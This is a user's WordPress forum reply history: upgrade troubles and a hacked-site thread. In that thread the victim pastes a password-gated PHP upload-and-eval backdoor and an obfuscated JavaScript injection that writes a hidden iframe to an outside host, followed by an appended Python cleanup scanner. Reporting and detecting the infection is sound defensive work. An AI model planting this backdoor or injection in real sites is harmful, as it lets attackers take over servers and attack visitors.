elorgwhee
Forum Replies Created
Forum: Installing WordPress
In reply to: Unable to Upgrade to 2.8 – 404s – Lost ability to Login
Tried to downgrade back to 2.71 and was still experiencing the same issues. I could see my content, but was getting 404’s on wp-admin/* and wp-login.php so I wasn’t able to change any admin settings or login and post any entries, etc.
Gave it a couple of days to mull it over and figured it out. I was unzipping everything locally on my computer and uploading the unzipped files. I should’ve known better. Uploaded the zip file, unzipped on the server – everything works fine now.
Forum: Installing WordPress
In reply to: Unable to Upgrade to 2.8 – 404s – Lost ability to Login
I’ve also tried renaming the plugins folder, editing the wp-settings file to change the memory settings from 32MB to 64MB, and removing the extra line of whitespace at the end of the wp-config.php file.
Still no luck / no change.
Forum: Fixing WordPress
In reply to: page navi only displays same posts
Thanks GamerZ for replying to this. I’m running into this same issue and have been having a hard time trying to find a solution.
I just want to be able to have my front page display only the items in the “News” category, and /Journal to display items in the “Journal” category, etc. Apparently when I filter the loop, the pagination breaks… =\
Forum: Fixing WordPress
In reply to: Are ‘web robots’ testing my wordpress security?
Tignarius: It’s not the wordpress upgrade. I’ve been getting those on my site (as well as friends) for over a year now. It looks like they just finally found your site.
On another note, take a look through the code in your posts if you have time. I started to notice that around the same time I started getting new bogus registration requests, I was also being hit by sql injections that were putting code in my blog entries. I’m not sure if that was related or not, I just happened to notice it around the same time because one of the injections actually broke my site which made it obvious.
I’d either disable registrations or set up some sort of captcha.
Good luck!
Forum: Fixing WordPress
In reply to: got hacked
Yeah, I’ve considered that. It’s really tempting. But I have a bit of custom code that was affected as well – so there’s no reinstalling it. I’d have to hope that my latest backup captured any of my recent updates to it.
Maybe I’ll just do that for wordpress and vanilla for now so at least those parts don’t continue to crash people’s computers. lol
Or maybe I can just cut over to the new site without any templates or plugins. It won’t be pretty, but it would work for now.. *rubs chin*
Forum: Fixing WordPress
In reply to: got hacked
Thanks whooami & Ivovic.
Between work, I’m still trying to clean this up enough to make it through another week of finishing the testing/configuration on the new server. It traversed my directories and got literally hundreds of files (thousands maybe?). Scripting the cleanup would be a heck of a lot easier, but I’m not confident in my scripting abilities and friends are helping where they can (when they have time). Meanwhile, it’s all manual.
>_<
Forum: Fixing WordPress
In reply to: got hacked
I’ve been keeping up with the upgrades, and read through the security info that was posted and implemented everything that I could to keep things relatively secure. I’m more than just savvy and try to be conscious of possible security issues. I have a test environment at home where I test plugins, themes and upgrades, etc. Though I can’t rule out that it wasn’t my fault, nor the fact that I’m on a shared server. In moving to a new server, I’m installing everything clean and changing all passwords, etc. – but I’m not finished with the setup yet so I have to deal with this issue until I am.
I would like to think that just because there’s at least one person in this thread who was affected by this that doesn’t seem to have much of a clue and is a bit obnoxious about asking for help, that you aren’t assuming that everyone affected by this is a complete idiot.
Forum: Fixing WordPress
In reply to: got hacked
@ivovic –
Yeah, I’m currently working on fresh installs with all new passwords, etc., on a new server. Hopefully this will help. (So far?) it’s only my old install on my old server.
Forum: Fixing WordPress
In reply to: got hacked
Another update –
Is anyone running Vanilla forum? If it started in wordpress, then it “leaked” into my forum as well. This is going to take forever to clean up.
Forum: Fixing WordPress
In reply to: got hacked
Looks like they tagged all the php files – and even the files like the readme.html – though that file obviously doesn’t have the <?php tags in it.
There are these seemingly random files that start with pre_ that don’t appear to have any normal wordpress code in it. They have the page of blank space at the top and bottom. Looks like they found another php file and created a new file with that name but added “pre_” to the beginning?? “pre_hello.php” in the plugins directory, “pre_wp-cron.php” in the root directory…
Here’s the code:
<?php @error_reporting(E_ALL); @set_time_limit(0); global $HTTP_SERVER_VARS; define('PASSWD','b40395b7ce76774c614419fbeb3dd9a9'); function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("mark_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"]) == PASSWD) { if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"), $HTTP_POST_FILES["s"]["size"])) { if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code)) { testdata('save_ok'); }; //eval($code); } else { testdata('save_fail'); }; if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) { eval($code); testdata('ok'); } else { testdata('fail'); }; } else { testdata('pass'); }; testdata('end'); echo "</pre>"; ?>
Forum: Fixing WordPress
In reply to: got hacked
I was hacked just today as well with the same symptoms mentioned above (the ActiveX and the wp-stats, etc). This appears to be almost a bi-monthly thing and my friends and I started to suspect some sort of vulnerability in the theme I’m using (Hemmingway) – though this particular problem is new. Normally the posts are hacked with some sort of sql injection that causes the rest of the site to not load. It’s not normally this bad.
This was inserted into the bottom of ALL of my pages – they even got the 404.php! I’m going through and removing all the code now. It looks like I can’t even load /wp-admin/ either??
<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>
I have the following plugins:
Akismet
Awesomnews (not used or active though)
maintenance mode
pownce-for-wordpress (not yet used or active I don’t think – can’t confirm cuz I’m still cleaning up the code so I can login)
wordpress-automatic-upgrade
hello dolly
stats
They even got my plugins php files?!?
I also found some “pre_hello.php” file in my plugins directory. It looks like 3 pages of stuff – the first and last are all just carriage returns while the middle is code with lots of “testdata” bits.
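
The cleanup sweep these posts describe doing by hand, as an added example that is not part of the original posts: a Python scan that flags files carrying the quoted uploader markers and decodes any appended `document.write(count("..."))` trailer so you can see what it loads. The marker strings come from the two snippets quoted above; the function names, the sample tree and the `example.invalid` URL are constructed for illustration.

```python
import os
import re
import tempfile

# Markers copied from the two snippets quoted in the posts above.
DROPPER_MARKERS = ("testdata(", "eval($code)", "HTTP_POST_FILES")
INJECT_RE = re.compile(r'document\.write\(count\("((?:\\.|[^"\\])*)"\)\)')

def decode_shift2(literal):
    """Undo the injected count() routine: each character code minus 2."""
    return "".join(chr(ord(c) - 2) for c in literal.replace('\\"', '"'))

def scan(root):
    """Return sorted (relative path, finding) pairs for files needing review.
    Every file is read, not just *.php, because readme.html was tagged too."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            rel = os.path.relpath(path, root)
            if sum(m in text for m in DROPPER_MARKERS) >= 2:
                findings.append((rel, "upload/eval dropper"))
            for m in INJECT_RE.finditer(text):
                findings.append((rel, "injected: " + decode_shift2(m.group(1))))
    return sorted(findings)

def demo():
    """Build a constructed sample tree in a temp dir and scan it."""
    plain = "<iframe src=http://example.invalid/x width=1 height=1>"  # constructed
    enc = "".join(chr(ord(c) + 2) for c in plain).replace('"', '\\"')
    tail = "<?php echo '<script>document.write(count(\"%s\"));</script>';?>" % enc
    samples = {
        "index.php": "<?php get_header(); ?>\n" + tail,
        "readme.html": "<html>clean readme</html>",
        "plugins/pre_hello.php": "<?php function testdata($t) {} eval($code); ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Point `scan()` at a copy of the web root; it only reports, so each flagged file still needs to be compared against a clean release or backup before anything is removed.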